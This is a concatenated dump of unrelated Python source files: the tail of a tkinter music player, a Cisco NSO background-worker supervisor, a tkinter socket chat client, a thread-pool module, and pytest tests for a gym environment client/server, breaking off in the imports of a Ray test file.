# BUG FIX: the original passed ``command_=set_vol``; tkinter forwards unknown
# keyword options to Tcl, so creating the widget raised
# ``TclError: unknown option "-command_"`` and set_vol was never wired up.
scale = ttk.Scale(middleframe, from_=0, to=100, orient=HORIZONTAL,
                  cursor="hand2", command=set_vol)
# default volume value when you open the player
# show 25
scale.set(25)
# play 25 volume value
mixer.music.set_volume(0.25)
scale.grid(row=0, column=4, pady=20, padx=20)
# mute/ unmute toggle button; both icons are pre-loaded and swapped by
# mute_music()
mute = PhotoImage(file="images/mute.png")
volume = PhotoImage(file="images/volume.png")
volumeBtn = ttk.Button(middleframe, image=volume, command=mute_music)
volumeBtn.grid(row=0, column=5, padx=3)
# status bar at the bottom of the window; anchor=W left-aligns its text
statusBar = Label(root, text="Welcome to music_player",
                  relief=SUNKEN, anchor=W)
statusBar.pack(side=BOTTOM, fill=X)
# keyboard shortcut: Ctrl+O opens the file dialog (mirrors the File menu)
root.bind("<Control-o>", lambda e: browse_file())
# enter the Tk event loop; blocks until the window is closed
root.mainloop()
|
background_process.py | # -*- mode: python; python-indent: 4 -*-
"""A micro-framework for running background processes in Cisco NSO Python VM.
Running any kind of background workers in Cisco NSO can be rather tricky. This
will help you out! Just define a function that does what you want and create a
Process instance to run it!
We react to:
- background worker process dying (will restart it)
- NCS package events, like redeploy
- configuration changes (disable the background worker)
- HA events (if we are a slave)
"""
import logging
import logging.handlers
import multiprocessing
import os
import select
import socket
import threading
import time
import traceback
import typing
import ncs
from ncs.experimental import Subscriber
def _get_handler_impls(logger: logging.Logger) -> typing.Iterable[logging.Handler]:
"""For a given Logger instance, find the registered handlers.
A Logger instance may have handlers registered in the 'handlers' list.
Usually there is one handler registered to the Root Logger.
This function uses the same algorithm as Logger.callHandlers to find
all relevant handlers.
"""
c = logger
while c:
for hdlr in c.handlers:
yield hdlr
if not c.propagate:
c = None #break out
else:
c = c.parent
def _bg_wrapper(pipe_unused, log_q, log_config_q, log_level, bg_fun, *bg_fun_args):
    """Internal wrapper for the background worker function.

    Used to set up logging via a QueueHandler in the child process. The other end
    of the queue is observed by a QueueListener in the parent process.

    :param pipe_unused: child end of the supervisor pipe; not read here, but
        presumably held open so the parent sees EOF when this process dies --
        see the supervisor's select() loop
    :param log_q: queue carrying log records back to the parent process
    :param log_config_q: queue carrying log-level changes into this process
    :param log_level: initial level for this process's root logger
    :param bg_fun: the user-supplied worker function
    :param bg_fun_args: positional arguments passed on to bg_fun
    """
    # route all logging in this process through the queue to the parent
    queue_hdlr = logging.handlers.QueueHandler(log_q)
    root = logging.getLogger()
    root.setLevel(log_level)
    root.addHandler(queue_hdlr)
    # thread to monitor log level changes and reconfigure the root logger level
    log_reconf = LogReconfigurator(log_config_q, root)
    log_reconf.start()
    try:
        bg_fun(*bg_fun_args)
    except Exception as e:
        # last-resort logging so an uncaught worker error shows up in the
        # parent's logs instead of vanishing with the process
        root.error('Unhandled error in {} - {}: {}'.format(bg_fun.__name__, type(e).__name__, e))
        root.debug(traceback.format_exc())
class LogReconfigurator(threading.Thread):
    """Daemon thread that applies log-level changes received over a queue.

    Messages are ``(key, value)`` tuples: ``('exit', None)`` stops the
    thread, any other message's value is applied as the new level on
    *log_root*.
    """

    def __init__(self, q, log_root):
        """
        :param q: queue delivering (key, value) control messages
        :param log_root: logger whose level is adjusted (typically the root)
        """
        super(LogReconfigurator, self).__init__()
        self.daemon = True
        self.q = q
        self.log_root = log_root

    def run(self):
        while True:
            k, v = self.q.get()
            # BUG FIX: the original used ``k is 'exit'`` -- identity
            # comparison on strings depends on interning and is a
            # SyntaxWarning on modern CPython; compare by value.
            if k == 'exit':
                return
            self.log_root.setLevel(v)

    def stop(self):
        # wake the run() loop and make it return
        self.q.put(('exit', None))
class Process(threading.Thread):
    """Supervisor for running the main background process and reacting to
    various events

    Runs the worker function in a separate (spawned) OS process, restarts it
    when it dies, and starts/stops it based on the 'enabled' config leaf and
    on the node's HA mode.
    """

    def __init__(self, app, bg_fun, bg_fun_args=None, config_path=None):
        """
        :param app: the NSO Python application instance we run under
        :param bg_fun: function executed in the background worker process
        :param bg_fun_args: positional arguments for bg_fun
        :param config_path: path to a boolean 'enabled' leaf controlling the
            worker; None means the worker is always enabled
        """
        super(Process, self).__init__()
        self.app = app
        self.bg_fun = bg_fun
        # avoid the shared-mutable-default pitfall
        if bg_fun_args is None:
            bg_fun_args = []
        self.bg_fun_args = bg_fun_args
        self.config_path = config_path
        # parent end of the worker pipe; becoming readable means the child died
        self.parent_pipe = None
        self.log = app.log
        self.name = "{}.{}".format(self.app.__class__.__module__,
                                   self.app.__class__.__name__)
        self.log.info("{} supervisor starting".format(self.name))
        self.vmid = self.app._ncs_id
        # 'spawn' so the child starts from a clean interpreter state
        self.mp_ctx = multiprocessing.get_context('spawn')
        # control queue for the supervisor loop: 'enabled' / 'ha-master' / 'exit'
        self.q = self.mp_ctx.Queue()
        # start the config subscriber thread (only if a config leaf was given)
        if self.config_path is not None:
            self.config_subscriber = Subscriber(app=self.app, log=self.log)
            subscriber_iter = ConfigSubscriber(self.q, self.config_path)
            subscriber_iter.register(self.config_subscriber)
            self.config_subscriber.start()
        # start the HA event listener thread
        self.ha_event_listener = HaEventListener(app=self.app, q=self.q)
        self.ha_event_listener.start()
        # start the logging QueueListener thread: it forwards log records
        # produced in the worker process to the app's real handlers
        hdlrs = list(_get_handler_impls(self.app._logger))
        self.log_queue = self.mp_ctx.Queue()
        self.queue_listener = logging.handlers.QueueListener(self.log_queue, *hdlrs, respect_handler_level=True)
        self.queue_listener.start()
        self.current_log_level = self.app._logger.getEffectiveLevel()
        # start log config CDB subscriber
        self.log_config_q = self.mp_ctx.Queue()
        self.log_config_subscriber = Subscriber(app=self.app, log=self.log)
        log_subscriber_iter = LogConfigSubscriber(self.log_config_q, self.vmid)
        log_subscriber_iter.register(self.log_config_subscriber)
        self.log_config_subscriber.start()
        self.worker = None
        # Read initial configuration, using two separate transactions
        with ncs.maapi.Maapi() as m:
            with ncs.maapi.Session(m, '{}_supervisor'.format(self.name), 'system'):
                # in the 1st transaction read config data from the 'enabled' leaf
                with m.start_read_trans() as t_read:
                    if config_path is not None:
                        enabled = t_read.get_elem(self.config_path)
                        self.config_enabled = bool(enabled)
                    else:
                        # if there is no config_path we assume the process is always enabled
                        self.config_enabled = True
                # In the 2nd transaction read operational data regarding HA.
                # This is an expensive operation invoking a data provider, thus
                # we don't want to incur any unnecessary locks
                with m.start_read_trans(db=ncs.OPERATIONAL) as oper_t_read:
                    # Check if HA is enabled. This can only be configured in
                    # ncs.conf and requires NSO restart, so it is fine if we
                    # just read it the once.
                    if oper_t_read.exists("/tfnm:ncs-state/tfnm:ha"):
                        self.ha_enabled = True
                    else:
                        self.ha_enabled = False
                    # determine HA state if HA is enabled
                    if self.ha_enabled:
                        ha_mode = str(ncs.maagic.get_node(oper_t_read, '/tfnm:ncs-state/tfnm:ha/tfnm:mode'))
                        self.ha_master = (ha_mode == 'master')

    def run(self):
        """Supervisor main loop: keep worker liveness in sync with the
        desired state and react to control-queue messages."""
        self.app.add_running_thread(self.name + ' (Supervisor)')
        while True:
            try:
                # desired state: enabled in config AND (no HA, or we are master)
                should_run = self.config_enabled and (not self.ha_enabled or self.ha_master)
                if should_run and (self.worker is None or not self.worker.is_alive()):
                    self.log.info("Background worker process should run but is not running, starting")
                    if self.worker is not None:
                        self.worker_stop()
                    self.worker_start()
                if self.worker is not None and self.worker.is_alive() and not should_run:
                    self.log.info("Background worker process is running but should not run, stopping")
                    self.worker_stop()
                # check for input
                # NOTE(review): q._reader is a private multiprocessing.Queue
                # attribute; selecting on it is not a public API.
                waitable_rfds = [self.q._reader]
                if should_run:
                    waitable_rfds.append(self.parent_pipe)
                rfds, _, _ = select.select(waitable_rfds, [], [])
                for rfd in rfds:
                    if rfd == self.q._reader:
                        k, v = self.q.get()
                        if k == 'exit':
                            return
                        elif k == 'enabled':
                            self.config_enabled = v
                        elif k == "ha-master":
                            self.ha_master = v
                    if rfd == self.parent_pipe:
                        # getting a readable event on the pipe should mean the
                        # child is dead - wait for it to die and start again
                        # we'll restart it at the top of the loop
                        self.log.info("Child process died")
                        if self.worker.is_alive():
                            self.worker.join()
            except Exception as e:
                self.log.error('Unhandled exception in the supervisor thread: {} ({})'.format(type(e).__name__, e))
                self.log.debug(traceback.format_exc())
                # back off so a persistent error does not spin the loop
                time.sleep(1)

    def stop(self):
        """stop is called when the supervisor thread should stop and is part of
        the standard Python interface for threading.Thread
        """
        # stop the HA event listener
        self.log.debug("{}: stopping HA event listener".format(self.name))
        self.ha_event_listener.stop()
        # stop config CDB subscriber
        self.log.debug("{}: stopping config CDB subscriber".format(self.name))
        if self.config_path is not None:
            self.config_subscriber.stop()
        # stop log config CDB subscriber
        self.log.debug("{}: stopping log config CDB subscriber".format(self.name))
        self.log_config_subscriber.stop()
        # stop the logging QueueListener
        self.log.debug("{}: stopping logging QueueListener".format(self.name))
        self.queue_listener.stop()
        # stop us, the supervisor
        self.log.debug("{}: stopping supervisor thread".format(self.name))
        self.q.put(('exit', None))
        self.join()
        self.app.del_running_thread(self.name + ' (Supervisor)')
        # stop the background worker process
        self.log.debug("{}: stopping background worker process".format(self.name))
        self.worker_stop()

    def worker_start(self):
        """Starts the background worker process
        """
        self.log.info("{}: starting the background worker process".format(self.name))
        # Instead of using the usual worker thread, we use a separate process here.
        # This allows us to terminate the process on package reload / NSO shutdown.
        # using multiprocessing.Pipe which is shareable across a spawned
        # process, while os.pipe only works, per default over to a forked
        # child
        self.parent_pipe, child_pipe = self.mp_ctx.Pipe()
        # Instead of calling the bg_fun worker function directly, call our
        # internal wrapper to set up things like inter-process logging through
        # a queue.
        args = [child_pipe, self.log_queue, self.log_config_q, self.current_log_level, self.bg_fun] + self.bg_fun_args
        self.worker = self.mp_ctx.Process(target=_bg_wrapper, args=args)
        self.worker.start()
        # close child pipe in parent so only child is in possession of file
        # handle, which means we get EOF when the child dies
        child_pipe.close()

    def worker_stop(self):
        """Stops the background worker process
        """
        if self.worker is None:
            self.log.info("{}: asked to stop worker but background worker does not exist".format(self.name))
            return
        if self.worker.is_alive():
            self.log.info("{}: stopping the background worker process".format(self.name))
            self.worker.terminate()
        # give the worker a second to die after terminate()
        self.worker.join(timeout=1)
        if self.worker.is_alive():
            # NOTE(review): formats `self` rather than `self.name` -- likely
            # intended to be self.name like the other log lines.
            self.log.error("{}: worker not terminated on time, alive: {} process: {}".format(self, self.worker.is_alive(), self.worker))
class ConfigSubscriber(object):
    """CDB subscriber tracking the background worker's 'enabled' leaf.

    Given the path to a boolean 'enabled' leaf, this iterator object is
    registered with a CDB Subscriber; every time a transaction touches the
    subtree, the leaf's new value is forwarded to the supervisor queue as an
    ('enabled', bool) message so the worker process can be started or
    stopped accordingly.
    """

    def __init__(self, q, config_path):
        self.q = q
        self.config_path = config_path

    def register(self, subscriber):
        """Hook this iterator object into the given CDB Subscriber."""
        subscriber.register(self.config_path, priority=101, iter_obj=self)

    def pre_iterate(self):
        # fresh per-transaction state, defaulting to "disabled"
        initial_state = dict(enabled=False)
        return initial_state

    def iterate(self, keypath_unused, operation_unused, oldval_unused, newval, state):
        # keep only the latest value seen during this transaction
        state['enabled'] = newval
        return ncs.ITER_RECURSE

    def should_post_iterate(self, state_unused):
        # always forward the result to the supervisor
        return True

    def post_iterate(self, state):
        enabled_flag = bool(state['enabled'])
        self.q.put(("enabled", enabled_flag))
class LogConfigSubscriber(object):
    """CDB subscriber for python-vm logging level

    This subscriber monitors /python-vm/logging/level and
    /python-vm/logging/vm-levels{vmid}/level and propagates any changes to the
    child process which can then in turn log at the appropriate level. VM
    specific level naturally take precedence over the global level.
    """

    def __init__(self, q, vmid):
        """
        :param q: queue on which ('log-level', <int>) messages are emitted
        :param vmid: id of this Python VM, used to key the vm-levels list
        """
        self.q = q
        self.vmid = vmid
        # read in initial values for these nodes
        # a CDB subscriber only naturally gets changes but if we are to emit a
        # sane value we have to know what both underlying (global & vm specific
        # log level) are and thus must read it in first
        with ncs.maapi.single_read_trans('', 'system') as t_read:
            try:
                self.global_level = ncs.maagic.get_node(t_read, '/python-vm/logging/level')
            except Exception:
                # leaf not readable/set -- fall back to None
                self.global_level = None
            try:
                self.vm_level = ncs.maagic.get_node(t_read, '/python-vm/logging/vm-levels{{{}}}/level'.format(self.vmid))
            except Exception:
                # no vm-specific entry for this VM
                self.vm_level = None

    def register(self, subscriber):
        """Register both watched paths with the given CDB Subscriber."""
        subscriber.register('/python-vm/logging/level', priority=101, iter_obj=self)
        # we don't include /level here at the end as then we won't get notified
        # when the whole vm-levels list entry is deleted, we still get when
        # /levels is being set though (and it is mandatory so we know it will
        # always be there for whenever a vm-levels list entry exists)
        subscriber.register('/python-vm/logging/vm-levels{{{}}}'.format(self.vmid), priority=101, iter_obj=self)

    def pre_iterate(self):
        # no per-transaction state needed; levels are kept on self
        return {}

    def iterate(self, keypath, operation_unused, oldval_unused, newval, unused_state):
        # a change under the vm-levels list is VM specific; anything else is
        # a change of the global level
        if str(keypath[-3]) == "vm-levels":
            self.vm_level = newval
        else:
            self.global_level = newval
        return ncs.ITER_RECURSE

    def should_post_iterate(self, unused_state):
        return True

    def post_iterate(self, unused_state):
        # the log level enum in the YANG model maps the integer values to
        # python log levels quite nicely just by adding 1 and multiplying by 10
        # NOTE(review): if the enum can legitimately be 0, the `or` would fall
        # through to the global level -- confirm the YANG enum's value range.
        configured_level = int(self.vm_level or self.global_level)
        new_level = (configured_level+1)*10
        self.q.put(("log-level", new_level))
class HaEventListener(threading.Thread):
    """Thread forwarding HA events to the supervisor.

    HA events, like HA-mode transitions, are exposed over a
    notification API. This thread subscribes to those notifications
    and translates the relevant ones into ('ha-master', bool) messages
    on the supervisor queue.

    A WaitableEvent is used instead of a plain threading.Event because
    it exposes a file descriptor: the exit flag and the event socket
    can then both be waited upon with a single select() loop.
    """

    def __init__(self, app, q):
        super(HaEventListener, self).__init__()
        self.app = app
        self.log = app.log
        self.q = q
        self.log.info('{} supervisor: init'.format(self))
        self.exit_flag = WaitableEvent()

    def run(self):
        self.app.add_running_thread(self.__class__.__name__ + ' (HA event listener)')
        self.log.info('run() HA event listener')
        from _ncs import events
        event_socket = socket.socket()
        events.notifications_connect(event_socket, events.NOTIF_HA_INFO,
                                     ip='127.0.0.1', port=ncs.PORT)
        # ha-master is True only when this node becomes master; both
        # "none" and an initialized slave map to False
        translation = {
            events.HA_INFO_IS_MASTER: True,
            events.HA_INFO_IS_NONE: False,
            events.HA_INFO_SLAVE_INITIALIZED: False,
        }
        while True:
            readable, _, _ = select.select([self.exit_flag, event_socket], [], [])
            if self.exit_flag in readable:
                event_socket.close()
                return
            notification = events.read_notification(event_socket)
            # Can this fail? Could we get a KeyError here? Afraid to catch it
            # because I don't know what it could mean.
            ha_notif_type = notification['hnot']['type']
            if ha_notif_type in translation:
                self.q.put(('ha-master', translation[ha_notif_type]))

    def stop(self):
        self.exit_flag.set()
        self.join()
        self.app.del_running_thread(self.__class__.__name__ + ' (HA event listener)')
class WaitableEvent:
    """Event that can wake up a select() loop from another thread or process.

    Mimics the standard threading.Event interface (set/clear/is_set/wait)
    but is backed by an OS pipe, so it also exposes fileno() and can be
    passed to select.select() together with sockets - allowing a single
    select loop to wait on both.
    """

    def __init__(self):
        self._read_fd, self._write_fd = os.pipe()

    def wait(self, timeout=None):
        """Return True if the event is set, waiting at most *timeout* seconds.

        timeout=None blocks indefinitely; timeout=0 polls.
        """
        rfds, _, _ = select.select([self._read_fd], [], [], timeout)
        return self._read_fd in rfds

    def is_set(self):
        return self.wait(0)

    # camelCase alias kept for compatibility with the old
    # threading.Event API
    def isSet(self):
        return self.wait(0)

    def clear(self):
        # drain the single byte written by set() so the read side is
        # no longer readable
        if self.isSet():
            os.read(self._read_fd, 1)

    def set(self):
        # write only when not already set, so one os.read() in clear()
        # is always enough to drain the pipe
        if not self.isSet():
            os.write(self._write_fd, b'1')

    def fileno(self):
        """Return the FD number of the read side of the pipe, allows this
        object to be used with select.select()
        """
        return self._read_fd

    def __del__(self):
        # Be robust during interpreter shutdown and partial
        # construction: closing from __del__ must never raise (the
        # original propagated OSError on an already-closed fd).
        for fd in (getattr(self, '_read_fd', None),
                   getattr(self, '_write_fd', None)):
            if fd is not None:
                try:
                    os.close(fd)
                except OSError:
                    pass
|
Client.py | from tkinter import *
import tkinter
import socket
from threading import Thread
from time import sleep
def enter(self):
    """<Return> key handler: send the current entry text to the server.

    `self` is actually the Tk event object supplied by the binding and
    is unused. Mirrors send(): transmits the text, clears the entry,
    and flags message_sent so receive() does not beep for our own
    message. The "#quit" command closes the socket and the window.
    """
    global message_sent
    message = my_message.get()
    my_message.set("")
    s.send(bytes(message, "utf8"))
    # Leave message_sent True (exactly as send() does). The original
    # reset it to False right after, so receive() would ring the bell
    # even for messages this client sent with the Return key.
    message_sent = True
    if message == "#quit":
        s.close()
        window.quit()
def receive():
    """Background loop: append incoming chat lines to the listbox.

    Rings the terminal bell ("\\a") for messages that did not originate
    from this client. Exits when the socket is closed or any error
    occurs while receiving/displaying.
    """
    global message_sent
    while True:
        try:
            incoming = s.recv(1024).decode("utf8")
            message_list.insert(tkinter.END, incoming)
            # beep only for messages we did not send ourselves
            if not message_sent:
                print("\a")
            message_sent = False
        except:
            # socket closed or window destroyed - stop the thread
            break
def send():
    """Send-button handler: transmit the entry contents to the server.

    Clears the entry field and flags message_sent so receive() does
    not beep for our own message. The "#quit" command additionally
    closes the socket and the window.
    """
    global message_sent
    outgoing = my_message.get()
    my_message.set("")
    s.send(bytes(outgoing, "utf8"))
    message_sent = True
    if outgoing == "#quit":
        s.close()
        window.quit()
def closing():
    # Window-close (WM_DELETE_WINDOW) handler: send the "#quit" command
    # so the server learns about the disconnect before the app exits.
    my_message.set("#quit")
    send()
# --- connection details -------------------------------------------------
# keep asking until the user enters something that parses as host + port
while True:
    try:
        host = input("Enter Host IP : ")
        port = int(input("Enter Port : "))
        break
    except:
        print("Please verify details entered")

# --- GUI setup ----------------------------------------------------------
window = Tk()
# read the version string for the title bar; use a context manager so
# the file handle is closed (the original open(...).read() leaked it)
with open("../assets/version.txt", "r") as version_file:
    data = version_file.read()
window.title("Chat Room 101 | " + data)
window.iconbitmap("../assets/Icon.ico")
window.configure(bg="white")
message_frame = Frame(window, height=100, width=100, bg="black")
my_message = StringVar()
my_message.set("")
scroll_bar = Scrollbar(message_frame)
message_list = Listbox(message_frame, height=15, width=100, bg="black",
                       fg="white", yscrollcommand=scroll_bar.set)
scroll_bar.pack(side=RIGHT, fill=Y)
message_list.pack(side=LEFT, fill=BOTH)
message_frame.pack()
button_label = Label(window, text="Enter Your Message", bg="white")
button_label.pack()
text_field = Entry(window, textvariable=my_message, bg="white", width=50)
text_field.pack()
send_button = Button(window, text="Send", bg="white", command=send)
send_button.pack()
window.bind('<Return>', enter)
window.protocol("WM_DELETE_WINDOW", closing)

# --- network setup ------------------------------------------------------
s = socket.socket()
try:
    s.connect((host, port))
except:
    print("Please Verify Host IP and Port Number")
    sleep(5)
    # the original called sys.exit(0) but never imported sys, which
    # raised NameError instead of exiting; raise SystemExit directly
    raise SystemExit(0)

recieve_thread = Thread(target=receive)
recieve_thread.start()
mainloop() |
threadpool.py | import threading
import queue
from concurrent.futures import thread
import atexit
__author__ = 'zz'

# shutdown program immediately
# NOTE(review): thread._python_exit is a private attribute of
# concurrent.futures.thread; unregistering it stops the executor's
# atexit hook from waiting for worker threads at interpreter exit.
# This relies on CPython internals - confirm it still exists on the
# targeted Python version.
atexit.unregister(thread._python_exit)

# module-wide executor with 4 worker threads, shared by importers
thread_pool = thread.ThreadPoolExecutor(4)
# class ThreadPoll:
# def __init__(self, max_workers=4):
# self.max_workers = max_workers
# self.threads = []
# self.queue = queue.Queue()
# self.start()
#
# def start(self):
# for i in range(self.max_workers):
# t = threading.Thread(target=self.work)
# t.daemon = True
# t.start()
#
# def work(self):
# while True:
# fn = self.queue.get()
# if fn == None:
# return
# fn()
#
# def submit(self, fn):
# self.queue.put(fn)
#
# def shutdown(self, wait=False):
# self.queue.put(None)
|
client_server_test.py | import threading
import os
import functools
import sys
import tempfile
import pytest
import numpy as np
import gym
import gym.spaces
from .client import Client
from .server import Server
class ImageEnv:
    """
    Image based environment
    """

    def __init__(self):
        self.spec = None
        self.metadata = {}
        # NB: shape=() gives a single uint8 scalar observation
        self.observation_space = gym.spaces.Box(
            shape=(), low=0, high=255, dtype=np.uint8
        )
        self.action_space = gym.spaces.Discrete(3)
        # the observation is sampled once and returned forever after
        self._obs = self.observation_space.sample()

    def reset(self):
        return self._obs

    def step(self, act):
        # constant observation, zero reward, never done
        return self._obs, 0, False, {}

    def close(self):
        pass
class Vectorize:
    """
    Convert an Env into a VecEnv.

    Wraps a list of env factories and exposes the usual VecEnv
    interface (reset, step_async/step_wait, render, close), stepping
    the environments sequentially in-process.
    """

    def __init__(self, make_env_fns):
        # actions stashed by step_async until step_wait consumes them
        self._act = None
        self._envs = [fn() for fn in make_env_fns]
        self.observation_space = self._envs[0].observation_space
        self.action_space = self._envs[0].action_space
        # tuple/dict action spaces are not supported
        assert not hasattr(self.action_space, "spaces")
        self.spec = self._envs[0].spec
        self.metadata = self._envs[0].metadata

    def _merge_obs(self, raw_obs):
        # Stack per-env observations into batched arrays; dict spaces
        # are merged key by key.
        if hasattr(self.observation_space, "spaces"):
            # dict space
            obs = {}
            for name in self.observation_space.spaces:
                obs[name] = np.array([o[name] for o in raw_obs])
            return obs
        else:
            return np.array(raw_obs)

    def reset(self):
        return self._merge_obs([env.reset() for env in self._envs])

    def step_async(self, act):
        self._act = act

    def step_wait(self):
        raw_obs = []
        rews = []
        dones = []
        infos = []
        for i, e in enumerate(self._envs):
            # FIX: the original unpacked the info dict into `i`,
            # shadowing the loop index; use a distinct name instead
            o, r, d, info = e.step(self._act[i])
            raw_obs.append(o)
            rews.append(r)
            dones.append(d)
            infos.append(info)
        return self._merge_obs(raw_obs), np.array(rews), np.array(dones), infos

    def render(self, mode="human"):
        assert mode == "rgb_array"
        return np.array([e.render(mode) for e in self._envs])

    def close(self):
        for e in self._envs:
            e.close()
class NopEnvironment:
    """Minimal do-nothing environment with a dict observation space."""

    def __init__(self):
        self.spec = None
        self.metadata = {}
        self.observation_space = gym.spaces.Dict(
            [("obs", gym.spaces.Box(low=0, high=3, shape=(2, 3), dtype=np.int32))]
        )
        self.action_space = gym.spaces.Box(
            low=-1.0, high=1.0, shape=(2, 3), dtype=np.float32
        )
        # a single fixed observation returned by every reset()/step()
        self._obs = self.observation_space.sample()

    def reset(self):
        return self._obs

    def step(self, action):
        # constant observation, constant reward, never terminates
        return self._obs, 1.0, False, {}

    def close(self):
        pass
# from https://github.com/openai/baselines/blob/master/baselines/common/vec_env/test_vec_env.py
class _SimpleEnv(gym.Env):
    """
    An environment with a pre-determined observation space
    and RNG seed.

    The episode length is seed + 1; each step adds the action to the
    current observation.
    """

    def __init__(self, seed, shape, dtype, dict_obs_space):
        self._rand = np.random.RandomState(seed=seed)
        self._dict_obs_space = dict_obs_space
        self._dtype = dtype
        self._max_steps = seed + 1
        self._cur_obs = None
        self._cur_step = 0
        self.action_space = gym.spaces.Box(low=0, high=100, shape=shape, dtype=dtype)
        self._obs_keys = ["obs_a", "obs_b"]
        if self._dict_obs_space:
            spaces = []
            self._start_obs = {}
            for key in self._obs_keys:
                spaces.append((key, self.action_space))
                self._start_obs[key] = np.array(
                    self._rand.randint(0, 0x100, size=shape), dtype=dtype
                )
            self.observation_space = gym.spaces.Dict(spaces)
        else:
            self.observation_space = self.action_space
            self._start_obs = np.array(
                self._rand.randint(0, 0x100, size=shape), dtype=dtype
            )

    def step(self, action):
        # observation is advanced in place by adding the action
        if self._dict_obs_space:
            for key in self._obs_keys:
                self._cur_obs[key] += np.array(action, dtype=self._dtype)
        else:
            self._cur_obs += np.array(action, dtype=self._dtype)
        self._cur_step += 1
        done = self._cur_step >= self._max_steps
        reward = self._cur_step / self._max_steps
        return self._cur_obs, reward, done, {}

    def reset(self):
        # BUG FIX: the original aliased self._cur_obs = self._start_obs;
        # because step() mutates the observation in place (+=), that
        # corrupted the start observation, so later resets no longer
        # restored the initial state. Copy instead of aliasing.
        if self._dict_obs_space:
            self._cur_obs = {k: v.copy() for k, v in self._start_obs.items()}
        else:
            self._cur_obs = self._start_obs.copy()
        self._cur_step = 0
        return self._cur_obs

    def render(self, mode=None):
        assert mode == "rgb_array"
        return np.array(
            self._rand.randint(0, 0x100, size=(16, 8, 4)), dtype=self._dtype
        )
# shared-memory transport is only exercised on Linux; on other
# platforms run only the non-shared-memory variants
use_shared_memory_options = [True, False]
if sys.platform != "linux":
    use_shared_memory_options = [False]
@pytest.mark.parametrize("use_shared_memory", use_shared_memory_options)
@pytest.mark.parametrize("dict_obs_space", [True, False])
def test_simple_env(use_shared_memory, dict_obs_space):
    """Run a local Vectorize VecEnv and a Client/Server pair over the
    same deterministic _SimpleEnv instances and assert both produce
    identical observations, rewards, dones and renders at every step.
    """
    dtype = "uint8"
    shape = (3, 8)
    num_envs = 32
    num_steps = 1000
    # each env gets a distinct seed, which also fixes its episode length
    make_envs = [
        functools.partial(_SimpleEnv, seed, shape, dtype, dict_obs_space=dict_obs_space)
        for seed in range(num_envs)
    ]
    np.random.seed(31337)
    env1 = Vectorize(make_envs)
    # windows has no unix domain sockets; fall back to TCP there
    if sys.platform == "win32":
        socket_kind = "tcp"
        addr = ("127.0.0.1", 0)
    else:
        socket_kind = "unix"
        addr = os.path.join(tempfile.mkdtemp(), "netenv.sock")
        if os.path.exists(addr):
            os.remove(addr)
    s = Server(
        addr=addr,
        socket_kind=socket_kind,
        make_venv=lambda num_envs: Vectorize(make_envs),
    )
    # listen() returns the actual bound address (matters for port 0)
    addr = s.listen()
    t = threading.Thread(target=s.run, daemon=True)
    t.start()
    env2 = Client(
        addr=addr,
        socket_kind=socket_kind,
        num_envs=num_envs,
        env_options={},
        reuse_arrays=True,
        use_shared_memory=use_shared_memory,
    )
    actions = np.array(
        np.random.randint(0, 0x100, size=(num_envs,) + shape), dtype=dtype
    )

    def assert_arrays_close(arr1, arr2):
        # same shape and numerically equal
        assert np.array(arr1).shape == np.array(arr2).shape
        assert np.allclose(arr1, arr2)

    def assert_objs_close(obj1, obj2):
        # dict observations are compared key by key
        if isinstance(obj1, dict):
            assert obj1.keys() == obj2.keys()
            for key in obj1.keys():
                assert_arrays_close(obj1[key], obj2[key])
        else:
            assert_arrays_close(obj1, obj2)

    try:
        obs1, obs2 = env1.reset(), env2.reset()
        assert_objs_close(obs1, obs2)
        for _ in range(num_steps):
            actions = np.array(
                np.random.randint(0, 0x100, size=(num_envs,) + shape), dtype=dtype
            )
            for env in [env1, env2]:
                env.step_async(actions)
            outs1 = env1.step_wait()
            outs2 = env2.step_wait()
            # compare obs, rewards and dones; infos (index 3) are skipped
            for out1, out2 in zip(outs1[:3], outs2[:3]):
                assert_objs_close(out1, out2)
            rend1, rend2 = env1.render(mode="rgb_array"), env2.render(mode="rgb_array")
            assert_objs_close(rend1, rend2)
    finally:
        env1.close()
        env2.close()
@pytest.mark.skipif(sys.platform == "win32", reason="does not run on windows")
@pytest.mark.parametrize("use_shared_memory", use_shared_memory_options)
@pytest.mark.parametrize("make_env", [NopEnvironment, ImageEnv])
def test_unix_env_speed(use_shared_memory, make_env, benchmark):
    # benchmark the client/server transport over a unix domain socket
    env_speed(
        "unix",
        make_env=make_env,
        benchmark=benchmark,
        use_shared_memory=use_shared_memory,
    )
@pytest.mark.parametrize("make_env", [NopEnvironment, ImageEnv])
def test_tcp_env_speed(make_env, benchmark):
    # benchmark the client/server transport over TCP (no shared memory)
    env_speed("tcp", make_env=make_env, benchmark=benchmark)
@pytest.mark.parametrize(
    "wrapper,make_env", [("Vectorize", NopEnvironment), ("Vectorize", ImageEnv)]
)
def test_base_env_speed(wrapper, make_env, benchmark):
    # in-process Vectorize baseline to compare against the transports
    env_speed(wrapper, make_env=make_env, benchmark=benchmark)
def env_speed(kind, make_env, benchmark, use_shared_memory=False):
    """Benchmark helper: roll out 1000 steps on a 2-env VecEnv.

    kind is either "Vectorize" (in-process baseline) or a socket kind
    ("unix"/"tcp"), in which case a Server is started in a daemon
    thread and a Client is benchmarked against it.
    """
    n = 2
    if kind == "Vectorize":

        def make_venv():
            # in-process baseline; no networking involved
            return Vectorize([make_env] * n)

    else:
        socket_kind = kind
        # can't use Vectorize with retro since you can only have one instance per process
        vec_env_class = Vectorize

        def make_server_venv(num_envs):
            return vec_env_class([make_env] * num_envs)

        if socket_kind == "unix":
            addr = os.path.join(tempfile.mkdtemp(), "netenv.sock")
            if os.path.exists(addr):
                os.remove(addr)
        elif socket_kind == "tcp":
            # port 0 lets the OS pick a free port
            addr = ("127.0.0.1", 0)
        else:
            raise Exception("invalid socket_kind")
        s = Server(addr=addr, socket_kind=socket_kind, make_venv=make_server_venv)
        # listen() returns the actual bound address
        addr = s.listen()
        t = threading.Thread(target=s.run, daemon=True)
        t.start()

        def make_venv():
            return Client(
                addr=addr,
                socket_kind=socket_kind,
                num_envs=n,
                env_options={},
                reuse_arrays=True,
                use_shared_memory=use_shared_memory,
            )

    venv = make_venv()
    # one fixed action batch is enough for throughput measurement
    act = [venv.action_space.sample() for _ in range(n)]

    def rollout(max_steps):
        venv.reset()
        step_count = 0
        while step_count < max_steps:
            venv.step_async(act)
            venv.step_wait()
            step_count += 1

    benchmark(lambda: rollout(1000))
    venv.close()
|
test_failure.py | import json
import logging
import os
import signal
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
import ray.utils
import ray.ray_constants as ray_constants
from ray.exceptions import RayTaskError
from ray.cluster_utils import Cluster
from ray.test_utils import (
